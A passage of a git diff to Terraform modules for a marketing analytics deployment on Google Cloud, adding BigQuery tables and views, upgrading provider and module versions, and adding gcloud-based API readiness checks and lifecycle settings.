local.config_bigquery.table.churn_propensity_label.table_name - description = local.config_bigquery.table.churn_propensity_label.table_description + project = google_bigquery_dataset.feature_store.project + dataset_id = google_bigquery_dataset.feature_store.dataset_id + table_id = local.config_bigquery.table.churn_propensity_label.table_name + description = local.config_bigquery.table.churn_propensity_label.table_description # The deletion_protection attribute specifies whether the table should be protected from deletion. In this case, it's set to false, which means that the table can be deleted. deletion_protection = false @@ -162,13 +180,38 @@ resource "google_bigquery_table" "churn_propensity_label" { } } +# This resource creates a BigQuery table named lead_score_propensity_label +# in the dataset specified by google_bigquery_dataset.feature_store.dataset_id. +resource "google_bigquery_table" "lead_score_propensity_label" { + project = google_bigquery_dataset.feature_store.project + dataset_id = google_bigquery_dataset.feature_store.dataset_id + table_id = local.config_bigquery.table.lead_score_propensity_label.table_name + description = local.config_bigquery.table.lead_score_propensity_label.table_description + + # The deletion_protection attribute specifies whether the table should be protected from deletion. In this case, it's set to false, which means that the table can be deleted. + deletion_protection = false + labels = { + version = "prod" + } + + # The schema attribute specifies the schema of the table. In this case, the schema is defined in the JSON file. + schema = file("${local.sql_dir}/schema/table/lead_score_propensity_label.json") + + # The lifecycle block is used to configure the lifecycle of the table. In this case, the ignore_changes attribute is set to all, which means that Terraform will ignore + # any changes to the table and will not attempt to update the table. The prevent_destroy attribute is set to true, which means that Terraform will prevent the table from being destroyed. + lifecycle { + ignore_changes = all + prevent_destroy = true + } +} + # This resource creates a BigQuery table named user_dimensions # in the dataset specified by google_bigquery_dataset.feature_store.dataset_id. resource "google_bigquery_table" "user_dimensions" { - project = google_bigquery_dataset.feature_store.project - dataset_id = google_bigquery_dataset.feature_store.dataset_id - table_id = local.config_bigquery.table.user_dimensions.table_name - description = local.config_bigquery.table.user_dimensions.table_description + project = google_bigquery_dataset.feature_store.project + dataset_id = google_bigquery_dataset.feature_store.dataset_id + table_id = local.config_bigquery.table.user_dimensions.table_name + description = local.config_bigquery.table.user_dimensions.table_description # The deletion_protection attribute specifies whether the table should be protected from deletion. In this case, it's set to false, which means that the table can be deleted. deletion_protection = false @@ -190,10 +233,10 @@ resource "google_bigquery_table" "user_dimensions" { # This resource creates a BigQuery table named user_lifetime_dimensions # in the dataset specified by google_bigquery_dataset.feature_store.dataset_id. resource "google_bigquery_table" "user_lifetime_dimensions" { - project = google_bigquery_dataset.feature_store.project - dataset_id = google_bigquery_dataset.feature_store.dataset_id - table_id = local.config_bigquery.table.user_lifetime_dimensions.table_name - description = local.config_bigquery.table.user_lifetime_dimensions.table_description + project = google_bigquery_dataset.feature_store.project + dataset_id = google_bigquery_dataset.feature_store.dataset_id + table_id = local.config_bigquery.table.user_lifetime_dimensions.table_name + description = local.config_bigquery.table.user_lifetime_dimensions.table_description # The deletion_protection attribute specifies whether the table should be protected from deletion. In this case, it's set to false, which means that the table can be deleted. deletion_protection = false @@ -215,10 +258,10 @@ resource "google_bigquery_table" "user_lifetime_dimensions" { # This resource creates a BigQuery table named user_lookback_metrics # in the dataset specified by google_bigquery_dataset.feature_store.dataset_id. resource "google_bigquery_table" "user_lookback_metrics" { - project = google_bigquery_dataset.feature_store.project - dataset_id = google_bigquery_dataset.feature_store.dataset_id - table_id = local.config_bigquery.table.user_lookback_metrics.table_name - description = local.config_bigquery.table.user_lookback_metrics.table_description + project = google_bigquery_dataset.feature_store.project + dataset_id = google_bigquery_dataset.feature_store.dataset_id + table_id = local.config_bigquery.table.user_lookback_metrics.table_name + description = local.config_bigquery.table.user_lookback_metrics.table_description # The deletion_protection attribute specifies whether the table should be protected from deletion. In this case, it's set to false, which means that the table can be deleted. deletion_protection = false @@ -240,10 +283,10 @@ resource "google_bigquery_table" "user_lookback_metrics" { # This resource creates a BigQuery table named user_rolling_window_lifetime_metrics # in the dataset specified by google_bigquery_dataset.feature_store.dataset_id. resource "google_bigquery_table" "user_rolling_window_lifetime_metrics" { - project = google_bigquery_dataset.feature_store.project - dataset_id = google_bigquery_dataset.feature_store.dataset_id - table_id = local.config_bigquery.table.user_rolling_window_lifetime_metrics.table_name - description = local.config_bigquery.table.user_rolling_window_lifetime_metrics.table_description + project = google_bigquery_dataset.feature_store.project + dataset_id = google_bigquery_dataset.feature_store.dataset_id + table_id = local.config_bigquery.table.user_rolling_window_lifetime_metrics.table_name + description = local.config_bigquery.table.user_rolling_window_lifetime_metrics.table_description # The deletion_protection attribute specifies whether the table should be protected from deletion. In this case, it's set to false, which means that the table can be deleted. deletion_protection = false @@ -265,10 +308,10 @@ resource "google_bigquery_table" "user_rolling_window_lifetime_metrics" { # This resource creates a BigQuery table named user_rolling_window_metrics # in the dataset specified by google_bigquery_dataset.feature_store.dataset_id. resource "google_bigquery_table" "user_rolling_window_metrics" { - project = google_bigquery_dataset.feature_store.project - dataset_id = google_bigquery_dataset.feature_store.dataset_id - table_id = local.config_bigquery.table.user_rolling_window_metrics.table_name - description = local.config_bigquery.table.user_rolling_window_metrics.table_description + project = google_bigquery_dataset.feature_store.project + dataset_id = google_bigquery_dataset.feature_store.dataset_id + table_id = local.config_bigquery.table.user_rolling_window_metrics.table_name + description = local.config_bigquery.table.user_rolling_window_metrics.table_description # The deletion_protection attribute specifies whether the table should be protected from deletion. In this case, it's set to false, which means that the table can be deleted. deletion_protection = false @@ -287,13 +330,38 @@ resource "google_bigquery_table" "user_rolling_window_metrics" { } } +# This resource creates a BigQuery table named user_rolling_window_lead_metrics +# in the dataset specified by google_bigquery_dataset.feature_store.dataset_id. +resource "google_bigquery_table" "user_rolling_window_lead_metrics" { + project = google_bigquery_dataset.feature_store.project + dataset_id = google_bigquery_dataset.feature_store.dataset_id + table_id = local.config_bigquery.table.user_rolling_window_lead_metrics.table_name + description = local.config_bigquery.table.user_rolling_window_lead_metrics.table_description + + # The deletion_protection attribute specifies whether the table should be protected from deletion. In this case, it's set to false, which means that the table can be deleted. + deletion_protection = false + labels = { + version = "prod" + } + + # The schema attribute specifies the schema of the table. In this case, the schema is defined in the JSON file. + schema = file("${local.sql_dir}/schema/table/user_rolling_window_lead_metrics.json") + + # The lifecycle block is used to configure the lifecycle of the table. In this case, the ignore_changes attribute is set to all, which means that Terraform will ignore + # any changes to the table and will not attempt to update the table. The prevent_destroy attribute is set to true, which means that Terraform will prevent the table from being destroyed. + lifecycle { + ignore_changes = all + prevent_destroy = true + } +} + # This resource creates a BigQuery table named user_scoped_lifetime_metrics # in the dataset specified by google_bigquery_dataset.feature_store.dataset_id. resource "google_bigquery_table" "user_scoped_lifetime_metrics" { - project = google_bigquery_dataset.feature_store.project - dataset_id = google_bigquery_dataset.feature_store.dataset_id - table_id = local.config_bigquery.table.user_scoped_lifetime_metrics.table_name - description = local.config_bigquery.table.user_scoped_lifetime_metrics.table_description + project = google_bigquery_dataset.feature_store.project + dataset_id = google_bigquery_dataset.feature_store.dataset_id + table_id = local.config_bigquery.table.user_scoped_lifetime_metrics.table_name + description = local.config_bigquery.table.user_scoped_lifetime_metrics.table_description # The deletion_protection attribute specifies whether the table should be protected from deletion. In this case, it's set to false, which means that the table can be deleted. deletion_protection = false @@ -315,10 +383,10 @@ resource "google_bigquery_table" "user_scoped_lifetime_metrics" { # This resource creates a BigQuery table named user_scoped_metrics # in the dataset specified by google_bigquery_dataset.feature_store.dataset_id. resource "google_bigquery_table" "user_scoped_metrics" { - project = google_bigquery_dataset.feature_store.project - dataset_id = google_bigquery_dataset.feature_store.dataset_id - table_id = local.config_bigquery.table.user_scoped_metrics.table_name - description = local.config_bigquery.table.user_scoped_metrics.table_description + project = google_bigquery_dataset.feature_store.project + dataset_id = google_bigquery_dataset.feature_store.dataset_id + table_id = local.config_bigquery.table.user_scoped_metrics.table_name + description = local.config_bigquery.table.user_scoped_metrics.table_description # The deletion_protection attribute specifies whether the table should be protected from deletion. In this case, it's set to false, which means that the table can be deleted. deletion_protection = false @@ -340,10 +408,10 @@ resource "google_bigquery_table" "user_scoped_metrics" { # This resource creates a BigQuery table named user_scoped_segmentation_metrics # in the dataset specified by google_bigquery_dataset.feature_store.dataset_id. resource "google_bigquery_table" "user_scoped_segmentation_metrics" { - project = google_bigquery_dataset.feature_store.project - dataset_id = google_bigquery_dataset.feature_store.dataset_id - table_id = local.config_bigquery.table.user_scoped_segmentation_metrics.table_name - description = local.config_bigquery.table.user_scoped_segmentation_metrics.table_description + project = google_bigquery_dataset.feature_store.project + dataset_id = google_bigquery_dataset.feature_store.dataset_id + table_id = local.config_bigquery.table.user_scoped_segmentation_metrics.table_name + description = local.config_bigquery.table.user_scoped_segmentation_metrics.table_description # The deletion_protection attribute specifies whether the table should be protected from deletion. In this case, it's set to false, which means that the table can be deleted. deletion_protection = false @@ -365,10 +433,10 @@ resource "google_bigquery_table" "user_scoped_segmentation_metrics" { # This resource creates a BigQuery table named user_segmentation_dimensions # in the dataset specified by google_bigquery_dataset.feature_store.dataset_id. resource "google_bigquery_table" "user_segmentation_dimensions" { - project = google_bigquery_dataset.feature_store.project - dataset_id = google_bigquery_dataset.feature_store.dataset_id - table_id = local.config_bigquery.table.user_segmentation_dimensions.table_name - description = local.config_bigquery.table.user_segmentation_dimensions.table_description + project = google_bigquery_dataset.feature_store.project + dataset_id = google_bigquery_dataset.feature_store.dataset_id + table_id = local.config_bigquery.table.user_segmentation_dimensions.table_name + description = local.config_bigquery.table.user_segmentation_dimensions.table_description # The deletion_protection attribute specifies whether the table should be protected from deletion. In this case, it's set to false, which means that the table can be deleted. deletion_protection = false @@ -390,10 +458,10 @@ resource "google_bigquery_table" "user_segmentation_dimensions" { # This resource creates a BigQuery table named user_session_event_aggregated_metrics # in the dataset specified by google_bigquery_dataset.feature_store.dataset_id. resource "google_bigquery_table" "user_session_event_aggregated_metrics" { - project = google_bigquery_dataset.feature_store.project - dataset_id = google_bigquery_dataset.feature_store.dataset_id - table_id = local.config_bigquery.table.user_session_event_aggregated_metrics.table_name - description = local.config_bigquery.table.user_session_event_aggregated_metrics.table_description + project = google_bigquery_dataset.feature_store.project + dataset_id = google_bigquery_dataset.feature_store.dataset_id + table_id = local.config_bigquery.table.user_session_event_aggregated_metrics.table_name + description = local.config_bigquery.table.user_session_event_aggregated_metrics.table_description # The deletion_protection attribute specifies whether the table should be protected from deletion. In this case, it's set to false, which means that the table can be deleted. deletion_protection = false @@ -412,4 +480,27 @@ resource "google_bigquery_table" "user_session_event_aggregated_metrics" { } } +# This resource creates a BigQuery table named predictions_placeholder +# in the dataset specified by google_bigquery_dataset.purchase_propensity +resource "google_bigquery_table" "purchase_propurchase_propensity_predictions_placeholder" { + project = google_bigquery_dataset.purchase_propensity.project + dataset_id = google_bigquery_dataset.purchase_propensity.dataset_id + table_id = "predictions_placeholder" + description = "Dummy table to facilitate the creation of down stream dependent views" + + # The deletion_protection attribute specifies whether the table should be protected from deletion. In this case, it's set to false, which means that the table can be deleted. + deletion_protection = false + labels = { + version = "prod" + } + + # The schema attribute specifies the schema of the table. In this case, the schema is defined in the JSON file. + schema = file("${local.sql_dir}/schema/table/purchase_propensity_predictions_placeholder.json") + + # The lifecycle block is used to configure the lifecycle of the table. In this case, the ignore_changes attribute is set to all, which means that Terraform will ignore + # any changes to the table and will not attempt to update the table. + lifecycle { + ignore_changes = all + } +} diff --git a/infrastructure/terraform/modules/feature-store/main.tf b/infrastructure/terraform/modules/feature-store/main.tf index a17662bb..318639c6 100644 --- a/infrastructure/terraform/modules/feature-store/main.tf +++ b/infrastructure/terraform/modules/feature-store/main.tf @@ -17,128 +17,20 @@ data "local_file" "config_vars" { } locals { + source_root_dir = "../../.." config_vars = yamldecode(data.local_file.config_vars.content) config_bigquery = local.config_vars.bigquery feature_store_project_id = local.config_vars.bigquery.dataset.feature_store.project_id sql_dir = var.sql_dir_input - poetry_run_alias = "${var.poetry_cmd} run" builder_repository_id = "marketing-analytics-jumpstart-base-repo" - purchase_propensity_project_id = null_resource.check_bigquery_api.id != "" ? local.config_vars.bigquery.dataset.purchase_propensity.project_id : local.feature_store_project_id - churn_propensity_project_id = null_resource.check_bigquery_api.id != "" ? local.config_vars.bigquery.dataset.churn_propensity.project_id : local.feature_store_project_id - audience_segmentation_project_id = null_resource.check_bigquery_api.id != "" ? local.config_vars.bigquery.dataset.audience_segmentation.project_id : local.feature_store_project_id - auto_audience_segmentation_project_id = null_resource.check_bigquery_api.id != "" ? local.config_vars.bigquery.dataset.auto_audience_segmentation.project_id : local.feature_store_project_id - aggregated_vbb_project_id = null_resource.check_bigquery_api.id != "" ? local.config_vars.bigquery.dataset.aggregated_vbb.project_id : local.feature_store_project_id - customer_lifetime_value_project_id = null_resource.check_bigquery_api.id != "" ? local.config_vars.bigquery.dataset.customer_lifetime_value.project_id : local.feature_store_project_id - aggregate_predictions_project_id = null_resource.check_bigquery_api.id != "" ? local.config_vars.bigquery.dataset.aggregated_predictions.project_id : local.feature_store_project_id - gemini_insights_project_id = null_resource.check_bigquery_api.id != "" ? local.config_vars.bigquery.dataset.gemini_insights.project_id : local.feature_store_project_id -} - -module "project_services" { - source = "terraform-google-modules/project-factory/google//modules/project_services" - version = "14.1.0" - - disable_dependent_services = true - disable_services_on_destroy = false - - project_id = local.feature_store_project_id - - activate_apis = [ - "artifactregistry.googleapis.com", - "cloudbuild.googleapis.com", - "aiplatform.googleapis.com", - "logging.googleapis.com", - "monitoring.googleapis.com", - "bigquery.googleapis.com", - "bigquerystorage.googleapis.com", - "storage.googleapis.com", - "storage-api.googleapis.com", - ] -} - -# This resource executes gcloud commands to check whether the BigQuery API is enabled. -# Since enabling APIs can take a few seconds, we need to make the deployment wait until the API is enabled before resuming. -resource "null_resource" "check_bigquery_api" { - provisioner "local-exec" { - command = <<-EOT - COUNTER=0 - MAX_TRIES=100 - while ! gcloud services list --project=${module.project_services.project_id} | grep -i "bigquery.googleapis.com" && [ $COUNTER -lt $MAX_TRIES ] - do - sleep 6 - printf "." - COUNTER=$((COUNTER + 1)) - done - if [ $COUNTER -eq $MAX_TRIES ]; then - echo "bigquery api is not enabled, terraform can not continue!" - exit 1 - fi - sleep 20 - EOT - } - - depends_on = [ - module.project_services - ] -} - - -# This resource executes gcloud commands to check whether the aiplatform API is enabled. -# Since enabling APIs can take a few seconds, we need to make the deployment wait until the API is enabled before resuming. -resource "null_resource" "check_aiplatform_api" { - provisioner "local-exec" { - command = <<-EOT - COUNTER=0 - MAX_TRIES=100 - while ! gcloud services list --project=${module.project_services.project_id} | grep -i "aiplatform.googleapis.com" && [ $COUNTER -lt $MAX_TRIES ] - do - sleep 6 - printf "." - COUNTER=$((COUNTER + 1)) - done - if [ $COUNTER -eq $MAX_TRIES ]; then - echo "aiplatform api is not enabled, terraform can not continue!" - exit 1 - fi - sleep 20 - EOT - } - - depends_on = [ - module.project_services - ] -} - - -## This creates a cloud resource connection. -## Note: The cloud resource nested object has only one output only field - serviceAccountId. -resource "google_bigquery_connection" "vertex_ai_connection" { - connection_id = "vertex_ai" - project = null_resource.check_aiplatform_api.id != "" ? module.project_services.project_id : local.feature_store_project_id - location = local.config_bigquery.region - cloud_resource {} -} - - -# This resource binds the service account to the required roles -resource "google_project_iam_member" "vertex_ai_connection_sa_roles" { - depends_on = [ - module.project_services, - null_resource.check_aiplatform_api, - google_bigquery_connection.vertex_ai_connection - ] - - project = null_resource.check_aiplatform_api.id != "" ? module.project_services.project_id : local.feature_store_project_id - member = "serviceAccount:${google_bigquery_connection.vertex_ai_connection.cloud_resource[0].service_account_id}" - - for_each = toset([ - "roles/bigquery.jobUser", - "roles/bigquery.dataEditor", - "roles/storage.admin", - "roles/storage.objectViewer", - "roles/aiplatform.user", - "roles/bigquery.connectionUser", - "roles/bigquery.connectionAdmin" - ]) - role = each.key + purchase_propensity_project_id = local.config_vars.bigquery.dataset.purchase_propensity.project_id + churn_propensity_project_id = local.config_vars.bigquery.dataset.churn_propensity.project_id + lead_score_propensity_project_id = local.config_vars.bigquery.dataset.lead_score_propensity.project_id + audience_segmentation_project_id = local.config_vars.bigquery.dataset.audience_segmentation.project_id + auto_audience_segmentation_project_id = local.config_vars.bigquery.dataset.auto_audience_segmentation.project_id + aggregated_vbb_project_id = local.config_vars.bigquery.dataset.aggregated_vbb.project_id + customer_lifetime_value_project_id = local.config_vars.bigquery.dataset.customer_lifetime_value.project_id + aggregate_predictions_project_id = local.config_vars.bigquery.dataset.aggregated_predictions.project_id + gemini_insights_project_id = local.config_vars.bigquery.dataset.gemini_insights.project_id } diff --git a/infrastructure/terraform/modules/feature-store/outputs.tf b/infrastructure/terraform/modules/feature-store/outputs.tf new file mode 100644 index 00000000..2e9d4535 --- /dev/null +++ b/infrastructure/terraform/modules/feature-store/outputs.tf @@ -0,0 +1,18 @@ +# Copyright 2023 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +output "purchase_propensity_dataset_id" { + description = "Purchase Propensity use case dataset" + value = google_bigquery_dataset.purchase_propensity.dataset_id +} \ No newline at end of file diff --git a/infrastructure/terraform/modules/feature-store/variables.tf b/infrastructure/terraform/modules/feature-store/variables.tf index d20b92b7..a9bc07a5 100644 --- a/infrastructure/terraform/modules/feature-store/variables.tf +++ b/infrastructure/terraform/modules/feature-store/variables.tf @@ -37,8 +37,8 @@ variable "sql_dir_input" { description = "SQL queries directory" } -variable "poetry_cmd" { - description = "alias for poetry command on the current system" +variable "uv_run_alias" { + description = "alias for uv run command on the current system" type = string - default = "poetry" + default = "uv run" } diff --git a/infrastructure/terraform/modules/feature-store/versions.tf b/infrastructure/terraform/modules/feature-store/versions.tf index 5a896e28..2e275387 100644 --- a/infrastructure/terraform/modules/feature-store/versions.tf +++ b/infrastructure/terraform/modules/feature-store/versions.tf @@ -20,7 +20,12 @@ terraform { required_providers { google = { source = "hashicorp/google" - version = ">= 3.43.0, >= 3.53.0, >= 3.63.0, >= 4.83.0, < 5.0.0, < 6.0.0" + version = "5.45.0" + } + + google-beta = { + source = "hashicorp/google-beta" + version = "5.45.0" } } diff --git a/infrastructure/terraform/modules/monitor/main.tf b/infrastructure/terraform/modules/monitor/main.tf index 21252202..75ceef35 100644 --- a/infrastructure/terraform/modules/monitor/main.tf +++ b/infrastructure/terraform/modules/monitor/main.tf @@ -32,7 +32,7 @@ locals { module "project_services" { source = "terraform-google-modules/project-factory/google//modules/project_services" - version = "14.1.0" + version = "18.0.0" disable_dependent_services = false disable_services_on_destroy = false @@ -72,7 +72,7 @@ resource "null_resource" "check_bigquery_api" { module "dashboard_bigquery" { source = "terraform-google-modules/bigquery/google" - version = "~> 5.4" + version = "9.0.0" dataset_id = local.dashboard_dataset_name dataset_name = local.dashboard_dataset_name @@ -95,7 +95,7 @@ module "dashboard_bigquery" { module "load_bucket" { source = "terraform-google-modules/cloud-storage/google//modules/simple_bucket" - version = "~> 3.4.1" + version = "9.0.1" project_id = module.project_services.project_id name = "maj-monitor-${module.project_services.project_id}" location = var.location @@ -163,7 +163,7 @@ locals { module "log_export_bigquery" { source = "terraform-google-modules/bigquery/google" - version = "~> 5.4" + version = "9.0.0" dataset_id = local.log_dataset_name dataset_name = local.log_dataset_name @@ -250,12 +250,36 @@ data "template_file" "looker_studio_dashboard_url" { mds_ga4_product_dataset = "marketing_ga4_v1_${var.mds_dataset_suffix}" mds_ga4_base_dataset = "marketing_ga4_base_${var.mds_dataset_suffix}" mds_ads_product_dataset = "marketing_ads_v1_${var.mds_dataset_suffix}" + mds_ads_base_dataset = "marketing_ads_base_${var.mds_dataset_suffix}" logs_dataset = module.log_export_bigquery.bigquery_dataset.dataset_id aggregated_vbb_dataset = "aggregated_vbb" aggregated_predictions_dataset = "aggregated_predictions" gemini_insights_dataset = "gemini_insights" + purchase_propensity_dataset = var.purchase_propensity_dataset_id dataform_log_table_id = local.dataform_log_table_id vertex_pipelines_log_table_id = local.vertex_pipelines_log_table_id dataflow_log_table_id = local.dataflow_log_table_id } } + +data "template_file" "purchase_propensity_prediction_stats_query" { + template = file("${local.source_root_dir}/templates/purchase_propensity_smart_bidding_view.sql.tpl") + vars = { + project_id = var.feature_store_project_id + purchase_propensity_dataset = var.purchase_propensity_dataset_id + activation_dataset = "activation" + smart_bidding_configuration_table = var.smart_bidding_configuration_table + } +} + +resource "google_bigquery_table" "purchase_propensity_prediction_stats" { + project = var.feature_store_project_id + dataset_id = var.purchase_propensity_dataset_id + table_id = "purchase_propensity_prediction_stats" + deletion_protection = false + + view { + query = data.template_file.purchase_propensity_prediction_stats_query.rendered + use_legacy_sql = false + } +} diff --git a/infrastructure/terraform/modules/monitor/variables.tf b/infrastructure/terraform/modules/monitor/variables.tf index a6323d88..83b59880 100644 --- a/infrastructure/terraform/modules/monitor/variables.tf +++ b/infrastructure/terraform/modules/monitor/variables.tf @@ -52,3 +52,12 @@ variable "activation_project_id" { type = string } +variable "purchase_propensity_dataset_id" { + description = "Purchase Propensity use case dataset" + type = string +} + +variable "smart_bidding_configuration_table" { + description = "smart bidding configuration table name" + type = string +} diff --git a/infrastructure/terraform/modules/monitor/versions.tf b/infrastructure/terraform/modules/monitor/versions.tf index 5a896e28..2e275387 100644 --- a/infrastructure/terraform/modules/monitor/versions.tf +++ b/infrastructure/terraform/modules/monitor/versions.tf @@ -20,7 +20,12 @@ terraform { required_providers { google = { source = "hashicorp/google" - version = ">= 3.43.0, >= 3.53.0, >= 3.63.0, >= 4.83.0, < 5.0.0, < 6.0.0" + version = "5.45.0" + } + + google-beta = { + source = "hashicorp/google-beta" + version = "5.45.0" } } diff --git a/infrastructure/terraform/modules/pipelines/main.tf b/infrastructure/terraform/modules/pipelines/main.tf index 05d4969b..5c5db7d3 100644 --- a/infrastructure/terraform/modules/pipelines/main.tf +++ b/infrastructure/terraform/modules/pipelines/main.tf @@ -35,9 +35,9 @@ locals { module "project_services" { source = "terraform-google-modules/project-factory/google//modules/project_services" - version = "14.1.0" + version = "18.0.0" - disable_dependent_services = true + disable_dependent_services = false disable_services_on_destroy = false project_id = local.pipeline_vars.project_id @@ -52,7 +52,9 @@ module "project_services" { "artifactregistry.googleapis.com", "aiplatform.googleapis.com", "dataflow.googleapis.com", - "bigqueryconnection.googleapis.com" + "bigqueryconnection.googleapis.com", + "servicenetworking.googleapis.com", + "compute.googleapis.com" ] } @@ -159,4 +161,30 @@ resource "null_resource" "check_artifactregistry_api" { depends_on = [ module.project_services ] -} \ No newline at end of file +} + +# This resource executes gcloud commands to check whether the Service Networking API is enabled. +# Since enabling APIs can take a few seconds, we need to make the deployment wait until the API is enabled before resuming. +resource "null_resource" "check_servicenetworking_api" { + provisioner "local-exec" { + command = <<-EOT + COUNTER=0 + MAX_TRIES=100 + while ! gcloud services list --project=${module.project_services.project_id} | grep -i "servicenetworking.googleapis.com" && [ $COUNTER -lt $MAX_TRIES ] + do + sleep 6 + printf "." + COUNTER=$((COUNTER + 1)) + done + if [ $COUNTER -eq $MAX_TRIES ]; then + echo "service networking api is not enabled, terraform can not continue!" + exit 1 + fi + sleep 20 + EOT + } + + depends_on = [ + module.project_services + ] +} diff --git a/infrastructure/terraform/modules/pipelines/pipelines.tf b/infrastructure/terraform/modules/pipelines/pipelines.tf index 1c36ef62..0074a536 100644 --- a/infrastructure/terraform/modules/pipelines/pipelines.tf +++ b/infrastructure/terraform/modules/pipelines/pipelines.tf @@ -18,6 +18,14 @@ resource "google_service_account" "service_account" { account_id = local.pipeline_vars.service_account_id display_name = local.pipeline_vars.service_account_id description = "Service Account to run Vertex AI Pipelines" + + # The lifecycle block is used to configure the lifecycle of the table. In this case, the ignore_changes attribute is set to all, which means that Terraform will ignore + # any changes to the table and will not attempt to update the table. The prevent_destroy attribute is set to true, which means that Terraform will prevent the table from being destroyed. + lifecycle { + ignore_changes = all + #prevent_destroy = true + create_before_destroy = true + } } # Wait for the pipelines service account to be created @@ -53,8 +61,8 @@ resource "google_project_iam_member" "pipelines_sa_roles" { module.project_services, null_resource.check_aiplatform_api, null_resource.wait_for_vertex_pipelines_sa_creation - ] - + ] + project = null_resource.check_aiplatform_api.id != "" ? module.project_services.project_id : local.pipeline_vars.project_id member = "serviceAccount:${google_service_account.service_account.email}" @@ -68,9 +76,18 @@ resource "google_project_iam_member" "pipelines_sa_roles" { "roles/artifactregistry.reader", "roles/pubsub.publisher", "roles/dataflow.developer", - "roles/bigquery.connectionUser" + "roles/bigquery.connectionUser", + "roles/compute.networkUser" ]) role = each.key + + # The lifecycle block is used to configure the lifecycle of the table. In this case, the ignore_changes attribute is set to all, which means that Terraform will ignore + # any changes to the table and will not attempt to update the table. The prevent_destroy attribute is set to true, which means that Terraform will prevent the table from being destroyed. + lifecycle { + ignore_changes = all + #prevent_destroy = true + create_before_destroy = true + } } # This resource binds the service account to the required roles in the mds project @@ -79,8 +96,8 @@ resource "google_project_iam_member" "pipelines_sa_mds_project_roles" { module.project_services, null_resource.check_aiplatform_api, null_resource.wait_for_vertex_pipelines_sa_creation - ] - + ] + project = null_resource.check_bigquery_api.id != "" ? module.project_services.project_id : local.pipeline_vars.project_id member = "serviceAccount:${google_service_account.service_account.email}" @@ -88,6 +105,14 @@ resource "google_project_iam_member" "pipelines_sa_mds_project_roles" { "roles/bigquery.dataViewer" ]) role = each.key + + # The lifecycle block is used to configure the lifecycle of the table. In this case, the ignore_changes attribute is set to all, which means that Terraform will ignore + # any changes to the table and will not attempt to update the table. The prevent_destroy attribute is set to true, which means that Terraform will prevent the table from being destroyed. + lifecycle { + ignore_changes = all + #prevent_destroy = true + create_before_destroy = true + } } # This resource creates a service account to run the dataflow jobs @@ -96,6 +121,14 @@ resource "google_service_account" "dataflow_worker_service_account" { account_id = local.dataflow_vars.worker_service_account_id display_name = local.dataflow_vars.worker_service_account_id description = "Service Account to run Dataflow jobs" + + # The lifecycle block is used to configure the lifecycle of the table. In this case, the ignore_changes attribute is set to all, which means that Terraform will ignore + # any changes to the table and will not attempt to update the table. The prevent_destroy attribute is set to true, which means that Terraform will prevent the table from being destroyed. + lifecycle { + ignore_changes = all + #prevent_destroy = true + create_before_destroy = true + } } # Wait for the dataflow worker service account to be created @@ -130,8 +163,8 @@ resource "google_project_iam_member" "dataflow_worker_sa_roles" { module.project_services, null_resource.check_dataflow_api, null_resource.wait_for_dataflow_worker_sa_creation - ] - + ] + project = null_resource.check_dataflow_api.id != "" ? module.project_services.project_id : local.pipeline_vars.project_id member = "serviceAccount:${google_service_account.dataflow_worker_service_account.email}" @@ -142,6 +175,14 @@ resource "google_project_iam_member" "dataflow_worker_sa_roles" { "roles/storage.objectAdmin", ]) role = each.key + + # The lifecycle block is used to configure the lifecycle of the table. In this case, the ignore_changes attribute is set to all, which means that Terraform will ignore + # any changes to the table and will not attempt to update the table. The prevent_destroy attribute is set to true, which means that Terraform will prevent the table from being destroyed. + lifecycle { + ignore_changes = all + #prevent_destroy = true + create_before_destroy = true + } } # This resource binds the service account to the required roles @@ -151,11 +192,19 @@ resource "google_service_account_iam_member" "dataflow_sa_iam" { module.project_services, null_resource.check_dataflow_api, null_resource.wait_for_dataflow_worker_sa_creation - ] - + ] + service_account_id = "projects/${module.project_services.project_id}/serviceAccounts/${google_service_account.dataflow_worker_service_account.email}" role = "roles/iam.serviceAccountUser" member = "serviceAccount:${google_service_account.service_account.email}" + + # The lifecycle block is used to configure the lifecycle of the table. In this case, the ignore_changes attribute is set to all, which means that Terraform will ignore + # any changes to the table and will not attempt to update the table. The prevent_destroy attribute is set to true, which means that Terraform will prevent the table from being destroyed. + lifecycle { + ignore_changes = all + #prevent_destroy = true + create_before_destroy = true + } } # This resource creates a Cloud Storage Bucket for the pipeline artifacts @@ -167,14 +216,14 @@ resource "google_storage_bucket" "pipelines_bucket" { uniform_bucket_level_access = true # The force_destroy attribute specifies whether the bucket should be forcibly destroyed # even if it contains objects. In this case, it's set to false, which means that the bucket will not be destroyed if it contains objects. - force_destroy = false + force_destroy = false - # The lifecycle block allows you to configure the lifecycle of the bucket. - # In this case, the ignore_changes attribute is set to all, which means that Terraform - # will ignore any changes to the bucket's lifecycle configuration. The prevent_destroy attribute is set to false, which means that the bucket can be destroyed. + # The lifecycle block is used to configure the lifecycle of the table. In this case, the ignore_changes attribute is set to all, which means that Terraform will ignore + # any changes to the table and will not attempt to update the table. The prevent_destroy attribute is set to true, which means that Terraform will prevent the table from being destroyed. lifecycle { ignore_changes = all - prevent_destroy = false ##true + #prevent_destroy = true + create_before_destroy = true } } @@ -187,14 +236,14 @@ resource "google_storage_bucket" "custom_model_bucket" { uniform_bucket_level_access = true # The force_destroy attribute specifies whether the bucket should be forcibly destroyed # even if it contains objects. In this case, it's set to false, which means that the bucket will not be destroyed if it contains objects. - force_destroy = false + force_destroy = false - # The lifecycle block allows you to configure the lifecycle of the bucket. - # In this case, the ignore_changes attribute is set to all, which means that Terraform - # will ignore any changes to the bucket's lifecycle configuration. The prevent_destroy attribute is set to false, which means that the bucket can be destroyed. + # The lifecycle block is used to configure the lifecycle of the table. In this case, the ignore_changes attribute is set to all, which means that Terraform will ignore + # any changes to the table and will not attempt to update the table. The prevent_destroy attribute is set to true, which means that Terraform will prevent the table from being destroyed. lifecycle { ignore_changes = all - prevent_destroy = false ##true + #prevent_destroy = true + create_before_destroy = true } } @@ -246,7 +295,7 @@ resource "google_artifact_registry_repository" "pipelines-repo" { repository_id = local.artifact_registry_vars.pipelines_repo.name description = "Pipelines Repository" # The format is kubeflow pipelines YAML files. - format = "KFP" + format = "KFP" # The lifecycle block of the google_artifact_registry_repository resource defines a precondition that # checks if the specified region is included in the vertex_pipelines_available_locations list. @@ 